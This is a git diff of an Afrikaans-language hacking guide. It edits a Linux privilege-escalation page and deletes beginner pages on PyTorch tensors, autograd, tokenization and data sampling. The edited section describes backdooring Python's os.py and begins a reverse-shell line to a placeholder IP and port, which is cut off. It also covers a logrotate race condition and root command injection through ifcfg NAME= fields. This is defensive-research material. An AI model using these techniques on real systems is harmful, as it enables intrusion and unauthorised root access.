Ek gaan nie hier lys hoe om al hierdie te doen nie, maar as jy belangstel kan jy die laaste toetse wat [**linpeas**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/linpeas.sh) uitvoer, nagaan.
|
||||||
|
|
||||||
## Skryfbare lêers
|
## Skryfbare lêers
|
||||||
|
|
||||||
### Python biblioteek kaping
|
### Python biblioteek kaping
|
||||||
|
|
||||||
As jy weet **waar** 'n python-skrip gaan uitgevoer word en jy **kan binne** daardie gids skryf of jy kan **python biblioteke** wysig, kan jy die OS-biblioteek wysig en dit backdoor (as jy kan skryf waar die python-skrip gaan uitgevoer word, kopieer en plak die os.py biblioteek).
|
As jy weet **waar** 'n python skrip gaan uitgevoer word en jy **kan skryf binne** daardie gids of jy kan **python biblioteke wysig**, kan jy die OS biblioteek wysig en dit backdoor (as jy kan skryf waar die python skrip gaan uitgevoer word, kopieer en plak die os.py biblioteek).
|
||||||
|
|
||||||
Om die **biblioteek te backdoor**, voeg net die volgende lyn aan die einde van die os.py biblioteek by (verander IP en PORT):
|
Om die **biblioteek te backdoor**, voeg net die volgende lyn aan die einde van die os.py biblioteek by (verander IP en PORT):
|
||||||
```python
|
```python
|
||||||
@ -1329,7 +1329,7 @@ import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s
|
|||||||
|
|
||||||
'n Kwetsbaarheid in `logrotate` laat gebruikers met **skrywe toestemmings** op 'n loglêer of sy ouer gidse potensieel verhoogde bevoegdhede verkry. Dit is omdat `logrotate`, wat dikwels as **root** loop, gemanipuleer kan word om arbitrêre lêers uit te voer, veral in gidse soos _**/etc/bash_completion.d/**_. Dit is belangrik om toestemmings te kontroleer nie net in _/var/log_ nie, maar ook in enige gids waar logrotasie toegepas word.
|
'n Kwetsbaarheid in `logrotate` laat gebruikers met **skrywe toestemmings** op 'n loglêer of sy ouer gidse potensieel verhoogde bevoegdhede verkry. Dit is omdat `logrotate`, wat dikwels as **root** loop, gemanipuleer kan word om arbitrêre lêers uit te voer, veral in gidse soos _**/etc/bash_completion.d/**_. Dit is belangrik om toestemmings te kontroleer nie net in _/var/log_ nie, maar ook in enige gids waar logrotasie toegepas word.
|
||||||
|
|
||||||
> [!NOTE]
|
> [!TIP]
|
||||||
> Hierdie kwesbaarheid raak `logrotate` weergawe `3.18.0` en ouer
|
> Hierdie kwesbaarheid raak `logrotate` weergawe `3.18.0` en ouer
|
||||||
|
|
||||||
Meer gedetailleerde inligting oor die kwesbaarheid kan op hierdie bladsy gevind word: [https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition](https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition).
|
Meer gedetailleerde inligting oor die kwesbaarheid kan op hierdie bladsy gevind word: [https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition](https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition).
|
||||||
@ -1346,7 +1346,7 @@ As 'n gebruiker om enige rede in staat is om **te skryf** 'n `ifcf-<whatever>` s
|
|||||||
|
|
||||||
Netwerk skripte, _ifcg-eth0_ byvoorbeeld, word gebruik vir netwerkverbindinge. Hulle lyk presies soos .INI lêers. Hulle word egter \~sourced\~ op Linux deur Network Manager (dispatcher.d).
|
Netwerk skripte, _ifcg-eth0_ byvoorbeeld, word gebruik vir netwerkverbindinge. Hulle lyk presies soos .INI lêers. Hulle word egter \~sourced\~ op Linux deur Network Manager (dispatcher.d).
|
||||||
|
|
||||||
In my geval, die `NAME=` wat in hierdie netwerk skripte toegeskryf word, word nie korrek hanteer nie. As jy **wit/leë spasie in die naam het, probeer die stelsel om die deel na die wit/leë spasie uit te voer**. Dit beteken dat **alles na die eerste leë spasie as root uitgevoer word**.
|
In my geval, die `NAME=` attribuut in hierdie netwerk skripte word nie korrek hanteer nie. As jy **wit/leë spasie in die naam het, probeer die stelsel om die deel na die wit/leë spasie uit te voer**. Dit beteken dat **alles na die eerste leë spasie as root uitgevoer word**.
|
||||||
|
|
||||||
Byvoorbeeld: _/etc/sysconfig/network-scripts/ifcfg-1337_
|
Byvoorbeeld: _/etc/sysconfig/network-scripts/ifcfg-1337_
|
||||||
```bash
|
```bash
|
||||||
@ -1389,7 +1389,7 @@ cisco-vmanage.md
|
|||||||
|
|
||||||
## Meer hulp
|
## Meer hulp
|
||||||
|
|
||||||
[Statiese impacket binaries](https://github.com/ropnop/impacket_static_binaries)
|
[Statiese impacket binaire](https://github.com/ropnop/impacket_static_binaries)
|
||||||
|
|
||||||
## Linux/Unix Privesc Gereedskap
|
## Linux/Unix Privesc Gereedskap
|
||||||
|
|
||||||
|
@ -1,285 +0,0 @@
|
|||||||
# 0. Basiese LLM Konsepte
|
|
||||||
|
|
||||||
## Vooropleiding
|
|
||||||
|
|
||||||
Vooropleiding is die grondslag fase in die ontwikkeling van 'n groot taalmodel (LLM) waar die model blootgestel word aan groot en diverse hoeveelhede teksdata. Gedurende hierdie fase, **leer die LLM die fundamentele strukture, patrone, en nuanses van taal**, insluitend grammatika, woordeskat, sintaksis, en kontekstuele verhoudings. Deur hierdie uitgebreide data te verwerk, verkry die model 'n breë begrip van taal en algemene wêreldkennis. Hierdie omvattende basis stel die LLM in staat om samehangende en kontekstueel relevante teks te genereer. Vervolgens kan hierdie vooropgeleide model fyn-afgestem word, waar dit verder opgelei word op gespesialiseerde datastelle om sy vermoëns aan te pas vir spesifieke take of domeine, wat sy prestasie en relevansie in geteikende toepassings verbeter.
|
|
||||||
|
|
||||||
## Hoof LLM komponente
|
|
||||||
|
|
||||||
Gewoonlik word 'n LLM gekarakteriseer deur die konfigurasie wat gebruik word om dit op te lei. Dit is die algemene komponente wanneer 'n LLM opgelei word:
|
|
||||||
|
|
||||||
- **Parameters**: Parameters is die **leerbare gewigte en vooroordele** in die neurale netwerk. Dit is die getalle wat die opleidingsproses aanpas om die verliesfunksie te minimaliseer en die model se prestasie op die taak te verbeter. LLMs gebruik gewoonlik miljoene parameters.
|
|
||||||
- **Kontekslengte**: Dit is die maksimum lengte van elke sin wat gebruik word om die LLM voor te oefen.
|
|
||||||
- **Inbeddimensie**: Die grootte van die vektor wat gebruik word om elke token of woord voor te stel. LLMs gebruik gewoonlik biljoene dimensies.
|
|
||||||
- **Verborge Dimensie**: Die grootte van die verborge lae in die neurale netwerk.
|
|
||||||
- **Aantal Lae (Diepte)**: Hoeveel lae die model het. LLMs gebruik gewoonlik tientalle lae.
|
|
||||||
- **Aantal Aandagkoppe**: In transformator modelle, dit is hoeveel aparte aandagmeganismes in elke laag gebruik word. LLMs gebruik gewoonlik tientalle koppe.
|
|
||||||
- **Dropout**: Dropout is iets soos die persentasie data wat verwyder word (waarskynlikhede word 0) tydens opleiding wat gebruik word om **oorpassing te voorkom.** LLMs gebruik gewoonlik tussen 0-20%.
|
|
||||||
|
|
||||||
Konfigurasie van die GPT-2 model:
|
|
||||||
```json
|
|
||||||
GPT_CONFIG_124M = {
|
|
||||||
"vocab_size": 50257, // Vocabulary size of the BPE tokenizer
|
|
||||||
"context_length": 1024, // Context length
|
|
||||||
"emb_dim": 768, // Embedding dimension
|
|
||||||
"n_heads": 12, // Number of attention heads
|
|
||||||
"n_layers": 12, // Number of layers
|
|
||||||
"drop_rate": 0.1, // Dropout rate: 10%
|
|
||||||
"qkv_bias": False // Query-Key-Value bias
|
|
||||||
}
|
|
||||||
```
|
|
||||||
## Tensors in PyTorch
|
|
||||||
|
|
||||||
In PyTorch, 'n **tensor** is 'n fundamentele datastruktuur wat dien as 'n multi-dimensionele array, wat konsepte soos skalar, vektore en matrikse veralgemeen na moontlik hoër dimensies. Tensors is die primêre manier waarop data voorgestel en gemanipuleer word in PyTorch, veral in die konteks van diep leer en neurale netwerke.
|
|
||||||
|
|
||||||
### Mathematical Concept of Tensors
|
|
||||||
|
|
||||||
- **Scalars**: Tensors van rang 0, wat 'n enkele getal voorstel (nul-dimensioneel). Soos: 5
|
|
||||||
- **Vectors**: Tensors van rang 1, wat 'n een-dimensionele array van getalle voorstel. Soos: \[5,1]
|
|
||||||
- **Matrices**: Tensors van rang 2, wat twee-dimensionele arrays met rye en kolomme voorstel. Soos: \[\[1,3], \[5,2]]
|
|
||||||
- **Higher-Rank Tensors**: Tensors van rang 3 of meer, wat data in hoër dimensies voorstel (bv. 3D tensors vir kleurbeelde).
|
|
||||||
|
|
||||||
### Tensors as Data Containers
|
|
||||||
|
|
||||||
From a computational perspective, tensors act as containers for multi-dimensional data, where each dimension can represent different features or aspects of the data. This makes tensors highly suitable for handling complex datasets in machine learning tasks.
|
|
||||||
|
|
||||||
### PyTorch Tensors vs. NumPy Arrays
|
|
||||||
|
|
||||||
While PyTorch tensors are similar to NumPy arrays in their ability to store and manipulate numerical data, they offer additional functionalities crucial for deep learning:
|
|
||||||
|
|
||||||
- **Automatic Differentiation**: PyTorch tensors support automatic calculation of gradients (autograd), which simplifies the process of computing derivatives required for training neural networks.
|
|
||||||
- **GPU Acceleration**: Tensors in PyTorch can be moved to and computed on GPUs, significantly speeding up large-scale computations.
|
|
||||||
|
|
||||||
### Creating Tensors in PyTorch
|
|
||||||
|
|
||||||
You can create tensors using the `torch.tensor` function:
|
|
||||||
```python
|
|
||||||
pythonCopy codeimport torch
|
|
||||||
|
|
||||||
# Scalar (0D tensor)
|
|
||||||
tensor0d = torch.tensor(1)
|
|
||||||
|
|
||||||
# Vector (1D tensor)
|
|
||||||
tensor1d = torch.tensor([1, 2, 3])
|
|
||||||
|
|
||||||
# Matrix (2D tensor)
|
|
||||||
tensor2d = torch.tensor([[1, 2],
|
|
||||||
[3, 4]])
|
|
||||||
|
|
||||||
# 3D Tensor
|
|
||||||
tensor3d = torch.tensor([[[1, 2], [3, 4]],
|
|
||||||
[[5, 6], [7, 8]]])
|
|
||||||
```
|
|
||||||
### Tensor Data Tipes
|
|
||||||
|
|
||||||
PyTorch tensors kan data van verskillende tipes stoor, soos heelgetalle en drijvende-komma getalle.
|
|
||||||
|
|
||||||
Jy kan 'n tensor se datatipe nagaan met die `.dtype` attribuut:
|
|
||||||
```python
|
|
||||||
tensor1d = torch.tensor([1, 2, 3])
|
|
||||||
print(tensor1d.dtype) # Output: torch.int64
|
|
||||||
```
|
|
||||||
- Tensore wat van Python-heelgetalle geskep is, is van tipe `torch.int64`.
|
|
||||||
- Tensore wat van Python-vlottende getalle geskep is, is van tipe `torch.float32`.
|
|
||||||
|
|
||||||
Om 'n tensor se datatipe te verander, gebruik die `.to()` metode:
|
|
||||||
```python
|
|
||||||
float_tensor = tensor1d.to(torch.float32)
|
|
||||||
print(float_tensor.dtype) # Output: torch.float32
|
|
||||||
```
|
|
||||||
### Algemene Tensor Operasies
|
|
||||||
|
|
||||||
PyTorch bied 'n verskeidenheid operasies om tensors te manipuleer:
|
|
||||||
|
|
||||||
- **Toegang tot Vorm**: Gebruik `.shape` om die dimensies van 'n tensor te kry.
|
|
||||||
|
|
||||||
```python
|
|
||||||
print(tensor2d.shape) # Output: torch.Size([2, 2])
|
|
||||||
```
|
|
||||||
|
|
||||||
- **Hervorming van Tensors**: Gebruik `.reshape()` of `.view()` om die vorm te verander.
|
|
||||||
|
|
||||||
```python
|
|
||||||
reshaped = tensor2d.reshape(4, 1)
|
|
||||||
```
|
|
||||||
|
|
||||||
- **Transposering van Tensors**: Gebruik `.T` om 'n 2D tensor te transponer.
|
|
||||||
|
|
||||||
```python
|
|
||||||
transposed = tensor2d.T
|
|
||||||
```
|
|
||||||
|
|
||||||
- **Matriks Vermenigvuldiging**: Gebruik `.matmul()` of die `@` operator.
|
|
||||||
|
|
||||||
```python
|
|
||||||
result = tensor2d @ tensor2d.T
|
|
||||||
```
|
|
||||||
|
|
||||||
### Belangrikheid in Diep Leer
|
|
||||||
|
|
||||||
Tensors is noodsaaklik in PyTorch vir die bou en opleiding van neurale netwerke:
|
|
||||||
|
|
||||||
- Hulle stoor invoerdata, gewigte en vooroordele.
|
|
||||||
- Hulle fasiliteer operasies wat vereis word vir vorentoe en agtertoe passasies in opleidingsalgoritmes.
|
|
||||||
- Met autograd, stel tensors outomatiese berekening van gradiënte in staat, wat die optimaliseringsproses stroomlyn.
|
|
||||||
|
|
||||||
## Outomatiese Differensiasie
|
|
||||||
|
|
||||||
Outomatiese differensiasie (AD) is 'n berekeningstegniek wat gebruik word om **die afgeleides (gradiënte)** van funksies doeltreffend en akkuraat te evalueer. In die konteks van neurale netwerke, stel AD die berekening van gradiënte wat benodig word vir **optimaliseringsalgoritmes soos gradiëntafname** moontlik. PyTorch bied 'n outomatiese differensiasie enjin genaamd **autograd** wat hierdie proses vereenvoudig.
|
|
||||||
|
|
||||||
### Wiskundige Verklaring van Outomatiese Differensiasie
|
|
||||||
|
|
||||||
**1. Die Kettingreël**
|
|
||||||
|
|
||||||
In die hart van outomatiese differensiasie is die **kettingreël** van calculus. Die kettingreël stel dat as jy 'n samestelling van funksies het, die afgeleide van die saamgestelde funksie die produk van die afgeleides van die saamgestelde funksies is.
|
|
||||||
|
|
||||||
Wiskundig, as `y=f(u)` en `u=g(x)`, dan is die afgeleide van `y` ten opsigte van `x`:
|
|
||||||
|
|
||||||
<figure><img src="../../images/image (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
|
||||||
|
|
||||||
**2. Berekening Grafiek**
|
|
||||||
|
|
||||||
In AD word berekeninge voorgestel as knope in 'n **berekening grafiek**, waar elke knoop ooreenstem met 'n operasie of 'n veranderlike. Deur hierdie grafiek te traverseer, kan ons afgeleides doeltreffend bereken.
|
|
||||||
|
|
||||||
3. Voorbeeld
|
|
||||||
|
|
||||||
Kom ons oorweeg 'n eenvoudige funksie:
|
|
||||||
|
|
||||||
<figure><img src="../../images/image (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
|
||||||
|
|
||||||
Waar:
|
|
||||||
|
|
||||||
- `σ(z)` is die sigmoid funksie.
|
|
||||||
- `y=1.0` is die teikenetiket.
|
|
||||||
- `L` is die verlies.
|
|
||||||
|
|
||||||
Ons wil die gradiënt van die verlies `L` ten opsigte van die gewig `w` en vooroordeel `b` bereken.
|
|
||||||
|
|
||||||
**4. Berekening van Gradiënte Handmatig**
|
|
||||||
|
|
||||||
<figure><img src="../../images/image (2) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
|
||||||
|
|
||||||
**5. Numeriese Berekening**
|
|
||||||
|
|
||||||
<figure><img src="../../images/image (3) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
|
||||||
|
|
||||||
### Implementering van Outomatiese Differensiasie in PyTorch
|
|
||||||
|
|
||||||
Nou, kom ons kyk hoe PyTorch hierdie proses outomatiseer.
|
|
||||||
```python
|
|
||||||
pythonCopy codeimport torch
|
|
||||||
import torch.nn.functional as F
|
|
||||||
|
|
||||||
# Define input and target
|
|
||||||
x = torch.tensor([1.1])
|
|
||||||
y = torch.tensor([1.0])
|
|
||||||
|
|
||||||
# Initialize weights with requires_grad=True to track computations
|
|
||||||
w = torch.tensor([2.2], requires_grad=True)
|
|
||||||
b = torch.tensor([0.0], requires_grad=True)
|
|
||||||
|
|
||||||
# Forward pass
|
|
||||||
z = x * w + b
|
|
||||||
a = torch.sigmoid(z)
|
|
||||||
loss = F.binary_cross_entropy(a, y)
|
|
||||||
|
|
||||||
# Backward pass
|
|
||||||
loss.backward()
|
|
||||||
|
|
||||||
# Gradients
|
|
||||||
print("Gradient w.r.t w:", w.grad)
|
|
||||||
print("Gradient w.r.t b:", b.grad)
|
|
||||||
```
|
|
||||||
**Output:**
|
|
||||||
```css
|
|
||||||
cssCopy codeGradient w.r.t w: tensor([-0.0898])
|
|
||||||
Gradient w.r.t b: tensor([-0.0817])
|
|
||||||
```
|
|
||||||
## Terugpropagering in Groter Neurale Netwerke
|
|
||||||
|
|
||||||
### **1. Uitbreiding na Meervoudige Lae**
|
|
||||||
|
|
||||||
In groter neurale netwerke met meerdere lae, word die proses om gradiënte te bereken meer kompleks weens die verhoogde aantal parameters en operasies. Tog bly die fundamentele beginsels dieselfde:
|
|
||||||
|
|
||||||
- **Voorwaartse Deurloop:** Bereken die uitvoer van die netwerk deur insette deur elke laag te laat gaan.
|
|
||||||
- **Bereken Verlies:** Evalueer die verliesfunksie met behulp van die netwerk se uitvoer en die teikenetikette.
|
|
||||||
- **Achterwaartse Deurloop (Terugpropagering):** Bereken die gradiënte van die verlies ten opsigte van elke parameter in die netwerk deur die kettingreël herhaaldelik toe te pas van die uitvoerlaag terug na die insetlaag.
|
|
||||||
|
|
||||||
### **2. Terugpropagering Algoritme**
|
|
||||||
|
|
||||||
- **Stap 1:** Begin die netwerkparameters (gewigte en vooroordele).
|
|
||||||
- **Stap 2:** Vir elke opleidingsvoorbeeld, voer 'n voorwaartse deurloop uit om die uitvoer te bereken.
|
|
||||||
- **Stap 3:** Bereken die verlies.
|
|
||||||
- **Stap 4:** Bereken die gradiënte van die verlies ten opsigte van elke parameter met behulp van die kettingreël.
|
|
||||||
- **Stap 5:** Werk die parameters op met 'n optimalisering algoritme (bv. gradiëntafname).
|
|
||||||
|
|
||||||
### **3. Wiskundige Verteenwoordiging**
|
|
||||||
|
|
||||||
Oorweeg 'n eenvoudige neurale netwerk met een versteekte laag:
|
|
||||||
|
|
||||||
<figure><img src="../../images/image (5) (1).png" alt=""><figcaption></figcaption></figure>
|
|
||||||
|
|
||||||
### **4. PyTorch Implementasie**
|
|
||||||
|
|
||||||
PyTorch vereenvoudig hierdie proses met sy autograd enjin.
|
|
||||||
```python
|
|
||||||
import torch
|
|
||||||
import torch.nn as nn
|
|
||||||
import torch.optim as optim
|
|
||||||
|
|
||||||
# Define a simple neural network
|
|
||||||
class SimpleNet(nn.Module):
|
|
||||||
def __init__(self):
|
|
||||||
super(SimpleNet, self).__init__()
|
|
||||||
self.fc1 = nn.Linear(10, 5) # Input layer to hidden layer
|
|
||||||
self.relu = nn.ReLU()
|
|
||||||
self.fc2 = nn.Linear(5, 1) # Hidden layer to output layer
|
|
||||||
self.sigmoid = nn.Sigmoid()
|
|
||||||
|
|
||||||
def forward(self, x):
|
|
||||||
h = self.relu(self.fc1(x))
|
|
||||||
y_hat = self.sigmoid(self.fc2(h))
|
|
||||||
return y_hat
|
|
||||||
|
|
||||||
# Instantiate the network
|
|
||||||
net = SimpleNet()
|
|
||||||
|
|
||||||
# Define loss function and optimizer
|
|
||||||
criterion = nn.BCELoss()
|
|
||||||
optimizer = optim.SGD(net.parameters(), lr=0.01)
|
|
||||||
|
|
||||||
# Sample data
|
|
||||||
inputs = torch.randn(1, 10)
|
|
||||||
labels = torch.tensor([1.0])
|
|
||||||
|
|
||||||
# Training loop
|
|
||||||
optimizer.zero_grad() # Clear gradients
|
|
||||||
outputs = net(inputs) # Forward pass
|
|
||||||
loss = criterion(outputs, labels) # Compute loss
|
|
||||||
loss.backward() # Backward pass (compute gradients)
|
|
||||||
optimizer.step() # Update parameters
|
|
||||||
|
|
||||||
# Accessing gradients
|
|
||||||
for name, param in net.named_parameters():
|
|
||||||
if param.requires_grad:
|
|
||||||
print(f"Gradient of {name}: {param.grad}")
|
|
||||||
```
|
|
||||||
In hierdie kode:
|
|
||||||
|
|
||||||
- **Voorwaartse Deurloop:** Bereken die uitsette van die netwerk.
|
|
||||||
- **Achterwaartse Deurloop:** `loss.backward()` bereken die gradiënte van die verlies ten opsigte van alle parameters.
|
|
||||||
- **Parameter Opdatering:** `optimizer.step()` werk die parameters op gebaseer op die berekende gradiënte.
|
|
||||||
|
|
||||||
### **5. Verstaan van die Achterwaartse Deurloop**
|
|
||||||
|
|
||||||
Tydens die agterwaartse deurloop:
|
|
||||||
|
|
||||||
- PyTorch traverseer die berekeningsgrafiek in omgekeerde volgorde.
|
|
||||||
- Vir elke operasie, pas dit die kettingreël toe om gradiënte te bereken.
|
|
||||||
- Gradiënte word opgelaai in die `.grad` eienskap van elke parameter tensor.
|
|
||||||
|
|
||||||
### **6. Voordele van Outomatiese Differensiasie**
|
|
||||||
|
|
||||||
- **Doeltreffendheid:** Vermy oorbodige berekeninge deur tussenresultate te hergebruik.
|
|
||||||
- **Nauwkeurigheid:** Verskaf presiese afgeleides tot masjienpresisie.
|
|
||||||
- **Gebruiksgemak:** Elimineer handmatige berekening van afgeleides.
|
|
@ -1,95 +0,0 @@
|
|||||||
# 1. Tokenizing
|
|
||||||
|
|
||||||
## Tokenizing
|
|
||||||
|
|
||||||
**Tokenizing** is die proses om data, soos teks, in kleiner, hanteerbare stukke genaamd _tokens_ op te breek. Elke token word dan aan 'n unieke numeriese identifiseerder (ID) toegeken. Dit is 'n fundamentele stap in die voorbereiding van teks vir verwerking deur masjienleer modelle, veral in natuurlike taalverwerking (NLP).
|
|
||||||
|
|
||||||
> [!TIP]
|
|
||||||
> Die doel van hierdie aanvanklike fase is baie eenvoudig: **Verdeel die invoer in tokens (ids) op 'n manier wat sin maak**.
|
|
||||||
|
|
||||||
### **How Tokenizing Works**
|
|
||||||
|
|
||||||
1. **Splitting the Text:**
|
|
||||||
- **Basic Tokenizer:** 'n Eenvoudige tokenizer kan teks in individuele woorde en leestekens verdeel, terwyl spaties verwyder word.
|
|
||||||
- _Example:_\
|
|
||||||
Teks: `"Hello, world!"`\
|
|
||||||
Tokens: `["Hello", ",", "world", "!"]`
|
|
||||||
2. **Creating a Vocabulary:**
|
|
||||||
- Om tokens in numeriese IDs om te skakel, word 'n **vocabulary** geskep. Hierdie vocabulary lys al die unieke tokens (woorde en simbole) en ken elkeen 'n spesifieke ID toe.
|
|
||||||
- **Special Tokens:** Dit is spesiale simbole wat by die vocabulary gevoeg word om verskillende scenario's te hanteer:
|
|
||||||
- `[BOS]` (Beginning of Sequence): Dui die begin van 'n teks aan.
|
|
||||||
- `[EOS]` (End of Sequence): Dui die einde van 'n teks aan.
|
|
||||||
- `[PAD]` (Padding): Gebruik om alle reekse in 'n batch dieselfde lengte te maak.
|
|
||||||
- `[UNK]` (Unknown): Verteenwoordig tokens wat nie in die vocabulary is nie.
|
|
||||||
- _Example:_\
|
|
||||||
As `"Hello"` ID `64` toegeken word, `","` is `455`, `"world"` is `78`, en `"!"` is `467`, dan:\
|
|
||||||
`"Hello, world!"` → `[64, 455, 78, 467]`
|
|
||||||
- **Handling Unknown Words:**\
|
|
||||||
As 'n woord soos `"Bye"` nie in die vocabulary is nie, word dit vervang met `[UNK]`.\
|
|
||||||
`"Bye, world!"` → `["[UNK]", ",", "world", "!"]` → `[987, 455, 78, 467]`\
|
|
||||||
_(Aannemende `[UNK]` het ID `987`)_
|
|
||||||
|
|
||||||
### **Advanced Tokenizing Methods**
|
|
||||||
|
|
||||||
Terwyl die basiese tokenizer goed werk vir eenvoudige teks, het dit beperkings, veral met groot vocabularies en die hantering van nuwe of seldsame woorde. Gevorderde tokenizing metodes spreek hierdie probleme aan deur teks in kleiner subeenhede op te breek of die tokenisering proses te optimaliseer.
|
|
||||||
|
|
||||||
1. **Byte Pair Encoding (BPE):**
|
|
||||||
- **Purpose:** Verminder die grootte van die vocabulary en hanteer seldsame of onbekende woorde deur hulle op te breek in gereeld voorkomende byte pare.
|
|
||||||
- **How It Works:**
|
|
||||||
- Begin met individuele karakters as tokens.
|
|
||||||
- Samevoeg iteratief die mees gereelde pare van tokens in 'n enkele token.
|
|
||||||
- Gaan voort totdat daar geen meer gereelde pare is wat saamgevoeg kan word nie.
|
|
||||||
- **Benefits:**
|
|
||||||
- Elimineer die behoefte aan 'n `[UNK]` token aangesien alle woorde verteenwoordig kan word deur bestaande subwoord tokens te kombineer.
|
|
||||||
- Meer doeltreffende en buigsame vocabulary.
|
|
||||||
- _Example:_\
|
|
||||||
`"playing"` mag tokenized word as `["play", "ing"]` as `"play"` en `"ing"` gereelde subwoorde is.
|
|
||||||
2. **WordPiece:**
|
|
||||||
- **Used By:** Modelle soos BERT.
|
|
||||||
- **Purpose:** Soortgelyk aan BPE, breek dit woorde in subwoord eenhede om onbekende woorde te hanteer en die vocabulary grootte te verminder.
|
|
||||||
- **How It Works:**
|
|
||||||
- Begin met 'n basis vocabulary van individuele karakters.
|
|
||||||
- Voeg iteratief die mees gereelde subwoord by wat die waarskynlikheid van die opleidingsdata maksimeer.
|
|
||||||
- Gebruik 'n probabilistiese model om te besluit watter subwoorde saamgevoeg moet word.
|
|
||||||
- **Benefits:**
|
|
||||||
- Balans tussen 'n hanteerbare vocabulary grootte en effektiewe verteenwoordiging van woorde.
|
|
||||||
- Hanteer seldsame en saamgestelde woorde doeltreffend.
|
|
||||||
- _Example:_\
|
|
||||||
`"unhappiness"` mag tokenized word as `["un", "happiness"]` of `["un", "happy", "ness"]` afhangende van die vocabulary.
|
|
||||||
3. **Unigram Language Model:**
|
|
||||||
- **Used By:** Modelle soos SentencePiece.
|
|
||||||
- **Purpose:** Gebruik 'n probabilistiese model om die mees waarskynlike stel van subwoord tokens te bepaal.
|
|
||||||
- **How It Works:**
|
|
||||||
- Begin met 'n groot stel potensiële tokens.
|
|
||||||
- Verwyder iteratief tokens wat die minste die model se waarskynlikheid van die opleidingsdata verbeter.
|
|
||||||
- Finaliseer 'n vocabulary waar elke woord verteenwoordig word deur die mees waarskynlike subwoord eenhede.
|
|
||||||
- **Benefits:**
|
|
||||||
- Buigsame en kan taal meer natuurlik modelleer.
|
|
||||||
- Lei dikwels tot meer doeltreffende en kompakte tokenizations.
|
|
||||||
- _Example:_\
|
|
||||||
`"internationalization"` mag in kleiner, betekenisvolle subwoorde soos `["international", "ization"]` tokenized word.
|
|
||||||
|
|
||||||
## Code Example
|
|
||||||
|
|
||||||
Let's understand this better from a code example from [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch02/01_main-chapter-code/ch02.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch02/01_main-chapter-code/ch02.ipynb):
|
|
||||||
```python
|
|
||||||
# Download a text to pre-train the model
|
|
||||||
import urllib.request
|
|
||||||
url = ("https://raw.githubusercontent.com/rasbt/LLMs-from-scratch/main/ch02/01_main-chapter-code/the-verdict.txt")
|
|
||||||
file_path = "the-verdict.txt"
|
|
||||||
urllib.request.urlretrieve(url, file_path)
|
|
||||||
|
|
||||||
with open("the-verdict.txt", "r", encoding="utf-8") as f:
|
|
||||||
raw_text = f.read()
|
|
||||||
|
|
||||||
# Tokenize the code using GPT2 tokenizer version
|
|
||||||
import tiktoken
|
|
||||||
token_ids = tiktoken.get_encoding("gpt2").encode(txt, allowed_special={"[EOS]"}) # Allow the user of the tag "[EOS]"
|
|
||||||
|
|
||||||
# Print first 50 tokens
|
|
||||||
print(token_ids[:50])
|
|
||||||
#[40, 367, 2885, 1464, 1807, 3619, 402, 271, 10899, 2138, 257, 7026, 15632, 438, 2016, 257, 922, 5891, 1576, 438, 568, 340, 373, 645, 1049, 5975, 284, 502, 284, 3285, 326, 11, 287, 262, 6001, 286, 465, 13476, 11, 339, 550, 5710, 465, 12036, 11, 6405, 257, 5527, 27075, 11]
|
|
||||||
```
|
|
||||||
## Verwysings
|
|
||||||
|
|
||||||
- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
|
|
@ -1,240 +0,0 @@
|
|||||||
# 2. Data Sampling
|
|
||||||
|
|
||||||
## **Data Sampling**
|
|
||||||
|
|
||||||
**Data Sampling** is a crucial process in preparing data for training large language models (LLMs) like GPT. It involves organizing text data into input and target sequences that the model uses to learn how to predict the next word (or token) based on the preceding words. Proper data sampling ensures that the model effectively captures language patterns and dependencies.
|
|
||||||
|
|
||||||
> [!TIP]
|
|
||||||
> The goal of this second phase is very simple: **Sample the input data and prepare it for the training phase usually by separating the dataset into sentences of a specific length and generating also the expected response.**
|
|
||||||
|
|
||||||
### **Why Data Sampling Matters**
|
|
||||||
|
|
||||||
LLMs such as GPT are trained to generate or predict text by understanding the context provided by previous words. To achieve this, the training data must be structured in a way that the model can learn the relationship between sequences of words and their subsequent words. This structured approach allows the model to generalize and generate coherent and contextually relevant text.
|
|
||||||
|
|
||||||
### **Key Concepts in Data Sampling**
|
|
||||||
|
|
||||||
1. **Tokenization:** Breaking down text into smaller units called tokens (e.g., words, subwords, or characters).
|
|
||||||
2. **Sequence Length (max_length):** The number of tokens in each input sequence.
|
|
||||||
3. **Sliding Window:** A method to create overlapping input sequences by moving a window over the tokenized text.
|
|
||||||
4. **Stride:** The number of tokens the sliding window moves forward to create the next sequence.
|
|
||||||
|
|
||||||
### **Step-by-Step Example**
|
|
||||||
|
|
||||||
Let's walk through an example to illustrate data sampling.
|
|
||||||
|
|
||||||
**Example Text**
|
|
||||||
|
|
||||||
```arduino
|
|
||||||
"Lorem ipsum dolor sit amet, consectetur adipiscing elit."
|
|
||||||
```
|
|
||||||
|
|
||||||
**Tokenization**
|
|
||||||
|
|
||||||
Assume we use a **basic tokenizer** that splits the text into words and punctuation marks:
|
|
||||||
|
|
||||||
```vbnet
|
|
||||||
Tokens: ["Lorem", "ipsum", "dolor", "sit", "amet,", "consectetur", "adipiscing", "elit."]
|
|
||||||
```
|
|
||||||
|
|
||||||
**Parameters**
|
|
||||||
|
|
||||||
- **Max Sequence Length (max_length):** 4 tokens
|
|
||||||
- **Sliding Window Stride:** 1 token
|
|
||||||
|
|
||||||
**Creating Input and Target Sequences**
|
|
||||||
|
|
||||||
1. **Sliding Window Approach:**
|
|
||||||
- **Input Sequences:** Each input sequence consists of `max_length` tokens.
|
|
||||||
- **Target Sequences:** Each target sequence consists of the tokens that immediately follow the corresponding input sequence.
|
|
||||||
2. **Generating Sequences:**
|
|
||||||
|
|
||||||
